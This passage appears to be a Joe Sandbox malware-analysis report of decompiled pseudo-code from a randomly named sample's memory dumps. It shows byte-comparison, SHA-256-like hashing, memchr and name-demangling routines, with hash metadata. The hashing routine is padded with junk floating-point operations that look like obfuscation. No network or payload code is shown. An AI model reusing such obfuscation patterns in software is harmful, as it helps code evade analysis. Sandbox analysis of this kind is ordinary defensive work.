								_t108 = (0 | _t279 > 0x00000000) - 1; // -1
								_t263 = (_t279 > 0) + _t108;
								if(_t263 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t286 = (_t188 & 0x000000ff) - ( *(_t181 - 0x10) & 0x000000ff);
							if(_t286 == 0) {
								L37:
								_t288 = ( *(_t177 - 0xf) & 0x000000ff) - ( *(_t181 - 0xf) & 0x000000ff);
								if(_t288 == 0) {
									L39:
									_t290 = ( *(_t177 - 0xe) & 0x000000ff) - ( *(_t181 - 0xe) & 0x000000ff);
									if(_t290 == 0) {
										L41:
										_t263 = ( *(_t177 - 0xd) & 0x000000ff) - ( *(_t181 - 0xd) & 0x000000ff);
										if(_t263 != 0) {
											_t100 = (0 | _t263 > 0x00000000) - 1; // -1
											_t263 = (_t263 > 0) + _t100;
										}
										goto L44;
									}
									_t94 = (0 | _t290 > 0x00000000) - 1; // -1
									_t263 = (_t290 > 0) + _t94;
									if(_t263 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t88 = (0 | _t288 > 0x00000000) - 1; // -1
								_t263 = (_t288 > 0) + _t88;
								if(_t263 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t82 = (0 | _t286 > 0x00000000) - 1; // -1
							_t263 = (_t286 > 0) + _t82;
							if(_t263 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t293 = (_t187 & 0x000000ff) - ( *(_t181 - 0x14) & 0x000000ff);
						if(_t293 == 0) {
							L26:
							_t295 = ( *(_t177 - 0x13) & 0x000000ff) - ( *(_t181 - 0x13) & 0x000000ff);
							if(_t295 == 0) {
								L28:
								_t297 = ( *(_t177 - 0x12) & 0x000000ff) - ( *(_t181 - 0x12) & 0x000000ff);
								if(_t297 == 0) {
									L30:
									_t263 = ( *(_t177 - 0x11) & 0x000000ff) - ( *(_t181 - 0x11) & 0x000000ff);
									if(_t263 != 0) {
										_t75 = (0 | _t263 > 0x00000000) - 1; // -1
										_t263 = (_t263 > 0) + _t75;
									}
									goto L33;
								}
								_t69 = (0 | _t297 > 0x00000000) - 1; // -1
								_t263 = (_t297 > 0) + _t69;
								if(_t263 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t63 = (0 | _t295 > 0x00000000) - 1; // -1
							_t263 = (_t295 > 0) + _t63;
							if(_t263 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t57 = (0 | _t293 > 0x00000000) - 1; // -1
						_t263 = (_t293 > 0) + _t57;
						if(_t263 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t300 = (_t186 & 0x000000ff) - ( *(_t181 - 0x18) & 0x000000ff);
					if(_t300 == 0) {
						L15:
						_t302 = ( *(_t177 - 0x17) & 0x000000ff) - ( *(_t181 - 0x17) & 0x000000ff);
						if(_t302 == 0) {
							L17:
							_t304 = ( *(_t177 - 0x16) & 0x000000ff) - ( *(_t181 - 0x16) & 0x000000ff);
							if(_t304 == 0) {
								L19:
								_t263 = ( *(_t177 - 0x15) & 0x000000ff) - ( *(_t181 - 0x15) & 0x000000ff);
								if(_t263 != 0) {
									_t50 = (0 | _t263 > 0x00000000) - 1; // -1
									_t263 = (_t263 > 0) + _t50;
								}
								goto L22;
							}
							_t44 = (0 | _t304 > 0x00000000) - 1; // -1
							_t263 = (_t304 > 0) + _t44;
							if(_t263 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t38 = (0 | _t302 > 0x00000000) - 1; // -1
						_t263 = (_t302 > 0) + _t38;
						if(_t263 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t32 = (0 | _t300 > 0x00000000) - 1; // -1
					_t263 = (_t300 > 0) + _t32;
					if(_t263 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1c) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
					if(__esi == 0) {
						L4:
						__esi =  *(__eax - 0x1b) & 0x000000ff;
						__edx =  *(__ecx - 0x1b) & 0x000000ff;
						__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
						if(__esi == 0) {
							L6:
							__esi =  *(__eax - 0x1a) & 0x000000ff;
							__edx =  *(__ecx - 0x1a) & 0x000000ff;
							__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
							if(__esi == 0) {
								L8:
								__esi =  *(__eax - 0x19) & 0x000000ff;
								__edx =  *(__ecx - 0x19) & 0x000000ff;
								__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
								if(__esi != 0) {
									__edx = 0;
									_t25 = (0 | __esi > 0x00000000) - 1; // -1
									__esi = (__esi > 0) + _t25;
								}
								goto L11;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t19 = __edx - 1; // -1
							__esi = __edx + _t19;
							if(__edx + _t19 != 0) {
								goto L1;
							}
							goto L8;
						}
						__edx = 0;
						__edx = 0 | __esi > 0x00000000;
						_t13 = __edx - 1; // -1
						__esi = __edx + _t13;
						if(__edx + _t13 != 0) {
							goto L1;
						}
						goto L6;
					}
					__edx = 0;
					__edx = 0 | __esi > 0x00000000;
					_t7 = __edx - 1; // -1
					__esi = __edx + _t7;
					if(__edx + _t7 != 0) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t178 = _t263;
				goto L80;
			}

0x003c04d5
0x003c04d5
0x003c04db
0x003c0546
0x003c0548
0x003c054a
0x00000000
0x00000000
0x003c054c
0x003c0552
0x003c05c9
0x003c05cb
0x003c05cd
0x00000000
0x00000000
0x003c05d3
0x003c05d9
0x003c0650
0x003c0652
0x003c0654
0x00000000
0x00000000
0x003c065a
0x003c0660
0x003c06d7
0x003c06d9
0x003c06db
0x00000000
0x00000000
0x003c06e7
0x003c075f
0x003c0761
0x003c0763
0x00000000
0x00000000
0x003c0769
0x003c076f
0x003c07e6
0x003c07e8
0x003c07ea
0x00000000
0x00000000
0x003c07f0
0x003c07f6
0x003c0865
0x003c0867
0x003c0869
0x003c086b
0x003c086b
0x003c086d
0x003c1511
0x003c1511
0x003c07ff
0x003c0801
0x003c0812
0x003c081a
0x003c081c
0x003c082d
0x003c0835
0x003c0837
0x003c084c
0x003c0854
0x003c0856
0x003c085f
0x003c085f
0x003c085f
0x00000000
0x003c0856
0x003c0840
0x003c0846
0x00000000
0x00000000
0x003c0848
0x003c0848
0x00000000
0x003c0848
0x003c0825
0x003c082b
0x00000000
0x00000000
0x00000000
0x003c082b
0x003c080a
0x003c0810
0x00000000
0x00000000
0x00000000
0x003c0810
0x003c0778
0x003c077a
0x003c078f
0x003c0797
0x003c0799
0x003c07ae
0x003c07b6
0x003c07b8
0x003c07cd
0x003c07d5
0x003c07d7
0x003c07e0
0x003c07e0
0x003c07e0
0x00000000
0x003c07d7
0x003c07c1
0x003c07c1
0x003c07c7
0x00000000
0x00000000
0x00000000
0x003c07c7
0x003c07a2
0x003c07a2
0x003c07a8
0x00000000
0x00000000
0x00000000
0x003c07a8
0x003c0783
0x003c0783
0x003c0789
0x00000000
0x00000000
0x00000000
0x003c0789
0x003c06f1
0x003c06f3
0x003c0708
0x003c0710
0x003c0712
0x003c0727
0x003c072f
0x003c0731
0x003c0746
0x003c074e
0x003c0750
0x003c0759
0x003c0759
0x003c0759
0x00000000
0x003c0750
0x003c073a
0x003c073a
0x003c0740
0x00000000
0x00000000
0x00000000
0x003c0740
0x003c071b
0x003c071b
0x003c0721
0x00000000
0x00000000
0x00000000
0x003c0721
0x003c06fc
0x003c06fc
0x003c0702
0x00000000
0x00000000
0x00000000
0x003c0702
0x003c0669
0x003c066b
0x003c0680
0x003c0688
0x003c068a
0x003c069f
0x003c06a7
0x003c06a9
0x003c06be
0x003c06c6
0x003c06c8
0x003c06d1
0x003c06d1
0x003c06d1
0x00000000
0x003c06c8
0x003c06b2
0x003c06b2
0x003c06b8
0x00000000
0x00000000
0x00000000
0x003c06b8
0x003c0693
0x003c0693
0x003c0699
0x00000000
0x00000000
0x00000000
0x003c0699
0x003c0674
0x003c0674
0x003c067a
0x00000000
0x00000000
0x00000000
0x003c067a
0x003c05e2
0x003c05e4
0x003c05f9
0x003c0601
0x003c0603
0x003c0618
0x003c0620
0x003c0622
0x003c0637
0x003c063f
0x003c0641
0x003c064a
0x003c064a
0x003c064a
0x00000000
0x003c0641
0x003c062b
0x003c062b
0x003c0631
0x00000000
0x00000000
0x00000000
0x003c0631
0x003c060c
0x003c060c
0x003c0612
0x00000000
0x00000000
0x00000000
0x003c0612
0x003c05ed
0x003c05ed
0x003c05f3
0x00000000
0x00000000
0x00000000
0x003c05f3
0x003c055b
0x003c055d
0x003c0572
0x003c057a
0x003c057c
0x003c0591
0x003c0599
0x003c059b
0x003c05b0
0x003c05b8
0x003c05ba
0x003c05c3
0x003c05c3
0x003c05c3
0x00000000
0x003c05ba
0x003c05a4
0x003c05a4
0x003c05aa
0x00000000
0x00000000
0x00000000
0x003c05aa
0x003c0585
0x003c0585
0x003c058b
0x00000000
0x00000000
0x00000000
0x003c058b
0x003c0566
0x003c0566
0x003c056c
0x00000000
0x00000000
0x00000000
0x003c04dd
0x003c04dd
0x003c04e0
0x003c04e4
0x003c04e6
0x003c04f7
0x003c04f7
0x003c04fb
0x003c04ff
0x003c0501
0x003c0512
0x003c0512
0x003c0516
0x003c051a
0x003c051c
0x003c052d
0x003c052d
0x003c0531
0x003c0535
0x003c0537
0x003c0539
0x003c0540
0x003c0540
0x003c0540
0x00000000
0x003c0537
0x003c051e
0x003c0522
0x003c0525
0x003c0525
0x003c052b
0x00000000
0x00000000
0x00000000
0x003c052b
0x003c0503
0x003c0507
0x003c050a
0x003c050a
0x003c0510
0x00000000
0x00000000
0x00000000
0x003c0510
0x003c04e8
0x003c04ec
0x003c04ef
0x003c04ef
0x003c04f5
0x00000000
0x00000000
0x00000000
0x003c04f5
0x003c04ce
0x003c04ce
0x00000000

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
Instruction ID: 9a6f958f54feffbcb0163dae1a9ccd7458ce0e3410ab78a133a163ef23b9b962
Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
Instruction Fuzzy Hash: DDB16D73D0B5F2898B7E452E0458B2BEE626E81B4032BC398DCD47F589C622AD559BD0

Uniqueness

Uniqueness Score: -1.00%

Function 0038E800 Relevance: .3, Instructions: 274
COMMONCrypto

Download Yara Rule

C-Code - Quality: 72%

			E0038E800(signed int __fp0, signed int _a4, intOrPtr _a8) {
				signed char _v8;
				intOrPtr _v12;
				signed int _v20;
				void* _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				signed int _v60;
				signed int _v64;
				void _v68;
				signed long long _v76;
				char _v332;
				intOrPtr _t91;
				signed char* _t94;
				void* _t107;
				intOrPtr _t108;
				signed char _t109;
				signed int _t110;
				intOrPtr _t111;
				signed char _t116;
				signed char _t117;
				signed int _t123;
				signed char _t124;
				signed int _t126;
				short _t134;
				signed int _t135;
				signed int _t138;
				intOrPtr _t139;
				intOrPtr _t141;
				intOrPtr _t142;
				signed char _t146;
				void* _t147;
				intOrPtr _t156;
				signed char _t165;
				intOrPtr _t169;
				signed int _t195;
				void* _t202;
				unsigned int* _t204;
				void* _t206;
				signed long long _t232;
				signed long long _t234;
				signed int _t243;
				signed int _t253;

				_t91 =  *0x3ce2ec; // 0x76d570f4
				_v12 = _t91;
				asm("fild dword [ebp-0x8]");
				_v28 = __fp0;
				_t134 =  *0x3ce440; // 0xeb96
				asm("fsubr qword [ebp-0x18]");
				_v12 = _t134;
				_v28 =  *0x3ce15c +  *0x3c7a18;
				asm("fild dword [ebp-0x8]");
				 *0x3ce440 = E0039CABC();
				asm("fld1");
				asm("fsubp st1, st0");
				_t135 = 0;
				 *0x3ce2ec =  *0x3ce2ec + 1;
				_t94 = _a8 + 2;
				_v28 =  *0x3ce5e0;
				 *0x3ce5e0 =  *0x3ce160 * _v28;
				_t232 =  *0x3ce160 -  *0x3c75c8;
				 *0x3ce160 = _t232;
				do {
					 *(_t206 + _t135 * 4 - 0x148) = ((( *(_t94 - 2) & 0x000000ff) << 0x00000008 |  *(_t94 - 1) & 0x000000ff) << 0x00000008 |  *_t94 & 0x000000ff) << 0x00000008 | _t94[1] & 0x000000ff;
					_t156 =  *0x3ce46c; // 0xd500
					_v12 = _t156 - 0x46112441;
					_t135 = _t135 + 1;
					_t94 =  &(_t94[4]);
					asm("fild dword [ebp-0x8]");
					_v28 = _t232;
					_t232 =  *0x3ce170 + _v28;
					 *0x3ce170 = _t232;
					_t212 = _t135 - 0x10;
				} while (_t135 != 0x10);
				_t202 = _a4 + 8;
				_v24 = _t202;
				memcpy( &_v68, _t202, 9 << 2);
				_v12 = E0038CF90(_t212, _t232, 0x3244, 0x100);
				_t234 =  *0x3c7a10;
				asm("fld1");
				_t138 = _v68;
				asm("fld1");
				 *0x3ce0b8 = ( *0x3ce0b8 & 0x0000ffff) * 0x82eb916e;
				_t126 = 0;
				_a4 = 0;
				_v32 =  &_v68 - 4;
				_t204 =  &_v332 - 8;
				do {
					if(_t126 > 0xf) {
						_t169 =  *0x3ce0cc; // 0x35085801
						_v8 = _t169 + 0x41eb2a4e;
						asm("fild dword [ebp-0x4]");
						asm("rol edi, 0xf");
						asm("rol ecx, 0xd");
						_v20 = _t234;
						_t195 =  *_t204 ^  *_t204 ^  *_t204 >> 0x0000000a;
						_t116 =  *0x3ce1a0; // 0x691fe8ac
						_v8 = _t116;
						_v76 =  *0x3ce3f0 -  *0x3ce520;
						_t204[2] = _t195;
						asm("fild dword [ebp-0x4]");
						asm("fcomp qword [ebp-0x10]");
						asm("fnstsw ax");
						_t243 =  *0x3ce3f0 + st2;
						 *0x3ce3f0 = _t243;
						if((_t116 & 0x00000041) == 0) {
							_t146 =  *0x3ce140; // 0x5ea6
							_v8 = _t146;
							asm("fild dword [ebp-0x4]");
							_v20 = _t243;
							_t243 =  *0x3ce198 +  *0x3c7a08;
							asm("fsubr qword [ebp-0x10]");
							 *0x3ce140 = E0039CABC();
						}
						_t117 =  *0x3ce1e8; // 0xa3c3
						_v8 = _t117;
						asm("fild dword [ebp-0x4]");
						_v20 = _t243;
						asm("rol edx, 0xe");
						 *0x3ce250 =  *0x3ce250 + _v20;
						asm("ror ecx, 0x7");
						_t204[2] = ( *(_t204 - 0x34) ^  *(_t204 - 0x34) ^  *(_t204 - 0x34) >> 0x00000003) +  *((intOrPtr*)(_t204 - 0x38)) +  *((intOrPtr*)(_t204 - 0x14)) + _t195;
						 *0x3ce0ac =  *0x3ce0ac + st1;
						_v20 =  *0x3ce0ac;
						asm("fsubr qword [ebp-0x10]");
						_v20 =  *0x3ce568;
						_t138 = _v68;
						_t234 =  *0x3ce0b4 * _v20;
						 *0x3ce0b4 = _t234;
					}
					asm("ror eax, 0xb");
					asm("rol edi, 0x7");
					asm("ror edi, 0x6");
					_t107 = (_v52 ^ _v52 ^ _v52) + ((_v48 ^ _v44) & _v52 ^ _v44) +  *((intOrPtr*)(_v12 + _t126 * 4)) + _t204[2] + _v40;
					_v56 = _v56 + _t107;
					asm("ror edi, 0xd");
					asm("rol edx, 0xa");
					asm("ror edx, 0x2");
					_t108 =  *0x3ce0fc; // 0xe5101c30
					_t139 =  *0x3ce5c4; // 0x7fffffff
					_t109 = _t108 + 0xb0d2e41c;
					_v8 = _t139 + _t109;
					asm("fild dword [ebp-0x4]");
					_v40 = ((_v64 | _t138) & _v60 | _v64 & _t138) + (_t138 ^ _t138 ^ _t138) + _t107;
					_v76 = _t234;
					_t165 =  *0x3ce24c; // 0x2b07f8d9
					_v8 = _t165;
					_v20 =  *0x3ce198 - st3;
					asm("fild dword [ebp-0x4]");
					asm("fcomp qword [ebp-0x48]");
					asm("fnstsw ax");
					_t234 =  *0x3ce198 + st2;
					 *0x3ce198 = _t234;
					 *0x3ce0fc =  *0x3ce0fc + 1;
					if((_t109 & 0x00000041) == 0) {
						_t253 =  *0x3ce480 - st2;
						 *0x3ce480 = _t253;
						_t124 =  *0x3ce4c0; // 0x94b914e2
						_v8 = _t124;
						asm("fild dword [ebp-0x4]");
						_v20 = _t253;
						_t234 =  *0x3ce480 + _v20 -  *0x3c7a00;
						asm("fsubp st1, st0");
						 *0x3ce360 = _t234;
						 *0x3ce4c0 =  *0x3ce4c0 - 1;
					}
					_t141 = _v32;
					_t110 = 8;
					do {
						_t110 = _t110 - 1;
						 *((intOrPtr*)(_t206 + _t110 * 4 - 0x3c)) =  *((intOrPtr*)(_t141 + 4 + _t110 * 4));
					} while (_t110 != 0);
					_t111 =  *0x3ce1c4; // 0x278e
					_t142 =  *0x3ce5c4; // 0x7fffffff
					_t82 = _t111 - 0x5227170d; // 0x2dd8e8f2
					_t138 = _v36;
					_t126 = _a4 + 1;
					_t204 =  &(_t204[1]);
					 *0x3ce238 = ( *0x3ce238 & 0x0000ffff) * (_t142 + _t82);
					_v68 = _t138;
					_a4 = _t126;
				} while (_t126 != 0x40);
				st1 = _t234;
				st1 = _t234;
				st0 = _t234;
				E00396570(0x100, _v12);
				_t147 = _v24;
				_t123 = 0;
				do {
					 *_t147 =  *_t147 +  *((intOrPtr*)(_t206 + _t123 * 4 - 0x40));
					_t123 = _t123 + 1;
					_t147 = _t147 + 4;
				} while (_t123 != 8);
				return _t123;
			}

0x0038e809
0x0038e80e
0x0038e811
0x0038e814
0x0038e81d
0x0038e824
0x0038e82a
0x0038e833
0x0038e836
0x0038e841
0x0038e84d
0x0038e852
0x0038e856
0x0038e85f
0x0038e86b
0x0038e86e
0x0038e87a
0x0038e886
0x0038e88c
0x0038e892
0x0038e8b0
0x0038e8b7
0x0038e8c7
0x0038e8ca
0x0038e8cb
0x0038e8ce
0x0038e8d1
0x0038e8da
0x0038e8dd
0x0038e8e3
0x0038e8e3
0x0038e8eb
0x0038e8fb
0x0038e903
0x0038e90a
0x0038e914
0x0038e91a
0x0038e91c
0x0038e91f
0x0038e927
0x0038e930
0x0038e93e
0x0038e941
0x0038e944
0x0038e947
0x0038e94a
0x0038e950
0x0038e960
0x0038e963
0x0038e968
0x0038e96b
0x0038e96e
0x0038e982
0x0038e984
0x0038e989
0x0038e98c
0x0038e98f
0x0038e992
0x0038e998
0x0038e99b
0x0038e9a3
0x0038e9a5
0x0038e9ae
0x0038e9b0
0x0038e9ba
0x0038e9bd
0x0038e9c0
0x0038e9c9
0x0038e9cf
0x0038e9d7
0x0038e9d7
0x0038e9dd
0x0038e9e6
0x0038e9e9
0x0038e9ec
0x0038e9fd
0x0038ea02
0x0038ea08
0x0038ea22
0x0038ea25
0x0038ea31
0x0038ea3a
0x0038ea3d
0x0038ea46
0x0038ea49
0x0038ea4c
0x0038ea4c
0x0038ea57
0x0038ea5c
0x0038ea63
0x0038ea82
0x0038ea85
0x0038ea88
0x0038ea8b
0x0038ea92
0x0038ea9c
0x0038eaaa
0x0038eab0
0x0038eab7
0x0038eaba
0x0038eac1
0x0038eac4
0x0038eacd
0x0038ead5
0x0038ead8
0x0038eadb
0x0038eae1
0x0038eae4
0x0038eaec
0x0038eaee
0x0038eaf4
0x0038eafd
0x0038eb05
0x0038eb07
0x0038eb0d
0x0038eb12
0x0038eb15
0x0038eb18
0x0038eb2a
0x0038eb30
0x0038eb32
0x0038eb38
0x0038eb38
0x0038eb3e
0x0038eb41
0x0038eb46
0x0038eb46
0x0038eb4b
0x0038eb4b
0x0038eb51
0x0038eb57
0x0038eb68
0x0038eb6f
0x0038eb75
0x0038eb76
0x0038eb79
0x0038eb80
0x0038eb83
0x0038eb86
0x0038eb92
0x0038eb95
0x0038eb9c
0x0038eb9e
0x0038eba3
0x0038ebab
0x0038ebb0
0x0038ebb4
0x0038ebb6
0x0038ebb7
0x0038ebba
0x0038ebc2

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32fff1bb0bd76b02335359b89dee2048a954749c6a43c2f52b8726dec3e4e204
Instruction ID: 821d6f4723824a52f621bb34552b96b17e043deade4effc87de967d6c3692e32
Opcode Fuzzy Hash: 32fff1bb0bd76b02335359b89dee2048a954749c6a43c2f52b8726dec3e4e204
Instruction Fuzzy Hash: 47B1C031E00619CBDB06DF96EC859ADBBB9FF84300F168495D885E33A8DB346971CB44

Uniqueness

Uniqueness Score: -1.00%

Function 0039C570 Relevance: .1, Instructions: 76
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0039C570(signed int _a4, signed char _a8, intOrPtr _a12) {
				intOrPtr _t13;
				void* _t14;
				signed char _t20;
				signed char _t24;
				signed int _t27;
				signed char _t32;
				unsigned int _t33;
				signed char _t35;
				signed char _t37;
				signed int _t39;

				_t13 = _a12;
				if(_t13 == 0) {
					L11:
					return _t13;
				} else {
					_t39 = _a4;
					_t20 = _a8;
					if((_t39 & 0x00000003) == 0) {
						L5:
						_t14 = _t13 - 4;
						if(_t14 < 0) {
							L8:
							_t13 = _t14 + 4;
							if(_t13 == 0) {
								goto L11;
							} else {
								while(1) {
									_t24 =  *_t39;
									_t39 = _t39 + 1;
									if((_t24 ^ _t20) == 0) {
										goto L20;
									}
									_t13 = _t13 - 1;
									if(_t13 != 0) {
										continue;
									} else {
										goto L11;
									}
									goto L24;
								}
								goto L20;
							}
						} else {
							_t20 = ((_t20 << 8) + _t20 << 0x10) + (_t20 << 8) + _t20;
							do {
								_t27 =  *_t39 ^ _t20;
								_t39 = _t39 + 4;
								if(((_t27 ^ 0xffffffff ^ 0x7efefeff + _t27) & 0x81010100) == 0) {
									goto L12;
								} else {
									_t32 =  *(_t39 - 4) ^ _t20;
									if(_t32 == 0) {
										return _t39 - 4;
									} else {
										_t33 = _t32 ^ _t20;
										if(_t33 == 0) {
											return _t39 - 3;
										} else {
											_t35 = _t33 >> 0x00000010 ^ _t20;
											if(_t35 == 0) {
												return _t39 - 2;
											} else {
												if((_t35 ^ _t20) == 0) {
													goto L20;
												} else {
													goto L12;
												}
											}
										}
									}
								}
								goto L24;
								L12:
								_t14 = _t14 - 4;
							} while (_t14 >= 0);
							goto L8;
						}
					} else {
						while(1) {
							_t37 =  *_t39;
							_t39 = _t39 + 1;
							if((_t37 ^ _t20) == 0) {
								break;
							}
							_t13 = _t13 - 1;
							if(_t13 == 0) {
								goto L11;
							} else {
								if((_t39 & 0x00000003) != 0) {
									continue;
								} else {
									goto L5;
								}
							}
							goto L24;
						}
						L20:
						return _t39 - 1;
					}
				}
				L24:
			}

0x0039c570
0x0039c577
0x0039c5cc
0x0039c5cc
0x0039c579
0x0039c579
0x0039c57f
0x0039c589
0x0039c5a1
0x0039c5a1
0x0039c5a4
0x0039c5b8
0x0039c5b8
0x0039c5bb
0x00000000
0x0039c5bd
0x0039c5bd
0x0039c5bd
0x0039c5bf
0x0039c5c4
0x00000000
0x00000000
0x0039c5c6
0x0039c5c9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0039c5c9
0x00000000
0x0039c5bd
0x0039c5a6
0x0039c5b3
0x0039c5d2
0x0039c5d4
0x0039c5e2
0x0039c5eb
0x00000000
0x0039c5ed
0x0039c5f0
0x0039c5f2
0x0039c61c
0x0039c5f4
0x0039c5f4
0x0039c5f6
0x0039c616
0x0039c5f8
0x0039c5fb
0x0039c5fd
0x0039c610
0x0039c5ff
0x0039c601
0x00000000
0x0039c603
0x00000000
0x0039c603
0x0039c601
0x0039c5fd
0x0039c5f6
0x0039c5f2
0x00000000
0x0039c5cd
0x0039c5cd
0x0039c5cd
0x00000000
0x0039c5b7
0x0039c58b
0x0039c58b
0x0039c58b
0x0039c58d
0x0039c592
0x00000000
0x00000000
0x0039c594
0x0039c597
0x00000000
0x0039c599
0x0039c59f
0x00000000
0x00000000
0x00000000
0x00000000
0x0039c59f
0x00000000
0x0039c597
0x0039c606
0x0039c60a
0x0039c60a
0x0039c589
0x00000000

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 9ea032c2db8339217e4535fcaee1d882c3155880831add86841c969f4fad1594
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 0311C8B726014243EE16CA3FD8B45BBA795EBC632172F727AD0428B758D222FD559600

Uniqueness

Uniqueness Score: -1.00%

Function 003AEA72 Relevance: 54.3, APIs: 36, Instructions: 344
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E003AEA72(void* __edx, void* __edi, void* __esi, signed int* _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _v36;
				signed int _v40;
				signed int _v44;
				char _v52;
				char _v60;
				intOrPtr* _t131;
				intOrPtr* _t132;
				unsigned int _t135;
				signed char _t137;
				signed int _t141;
				void* _t145;
				signed int _t154;
				unsigned int _t156;
				signed char _t158;
				signed int* _t163;
				intOrPtr* _t183;
				unsigned int _t185;
				void* _t189;
				void* _t191;
				char* _t207;
				signed int _t213;
				intOrPtr* _t214;
				signed int _t215;
				signed int _t219;
				void* _t222;
				signed int* _t224;
				void* _t227;
				signed int* _t238;
				signed char _t243;
				void* _t285;
				void* _t286;
				signed int _t288;
				void* _t290;
				signed int* _t291;
				signed int _t292;

				_t290 = __esi;
				_t286 = __edi;
				_t285 = __edx;
				_t131 =  *0x3d12d0; // 0x0
				_t247 =  *_t131;
				if(_t247 != 0) {
					__eflags = _t247 - 0x36;
					if(_t247 < 0x36) {
						L4:
						__eflags = _t247 - 0x5f;
						if(_t247 == 0x5f) {
							goto L6;
						} else {
							_t238 = _a4;
							_t238[1] = _t238[1] & 0xffff00ff;
							 *_t238 =  *_t238 & 0x00000000;
							__eflags =  *_t238;
							_t238[1] = 2;
							return _t238;
						}
					} else {
						__eflags = _t247 - 0x39;
						if(_t247 <= 0x39) {
							L6:
							_t243 = _t247 - 0x36;
							_t132 = _t131 + 1;
							 *0x3d12d0 = _t132;
							__eflags = _t243 - 0x29;
							if(_t243 != 0x29) {
								__eflags = _t243;
								if(_t243 < 0) {
									goto L14;
								} else {
									__eflags = _t243 - 3;
									goto L13;
								}
								goto L15;
							} else {
								_t247 =  *_t132;
								__eflags = _t247;
								if(_t247 == 0) {
									E003ABB9C(_t247, _a4, 1, _a8);
									_t163 = _a4;
								} else {
									_t243 = _t247 - 0x3d;
									 *0x3d12d0 = _t132 + 1;
									__eflags = _t243 - 4;
									if(_t243 < 4) {
										L14:
										_t243 = _t243 | 0xffffffff;
										__eflags = _t243;
									} else {
										__eflags = _t243 - 7;
										L13:
										if(__eflags > 0) {
											goto L14;
										}
									}
									L15:
									__eflags = _t243 - 0xffffffff;
									if(_t243 != 0xffffffff) {
										_v20 = _v20 & 0x00000000;
										_v16 = _v16 & 0xffff0000;
										_push(_t290);
										_t291 = _a8;
										_push(_t286);
										_v12 =  *_t291;
										_t288 = _t243 & 0x00000002;
										__eflags = _t288;
										_v8 = _t291[1];
										if(_t288 == 0) {
											L25:
											__eflags = _t243 & 0x00000004;
											if((_t243 & 0x00000004) != 0) {
												_t185 =  *0x3d12e0; // 0x0
												__eflags =  !(_t185 >> 1) & 0x00000001;
												_push( &_v60);
												if(__eflags == 0) {
													_t189 = E003AD7F7(_t285, __eflags);
													_t247 =  &_v12;
													E003AACC9( &_v12, _t189);
												} else {
													_t191 = E003AD7F7(_t285, __eflags);
													E003AB920(E003AB4AB( &_v52, 0x20),  &_v36, _t191);
													_v28 = _v36;
													_v24 = _v32;
													_t247 =  &_v28;
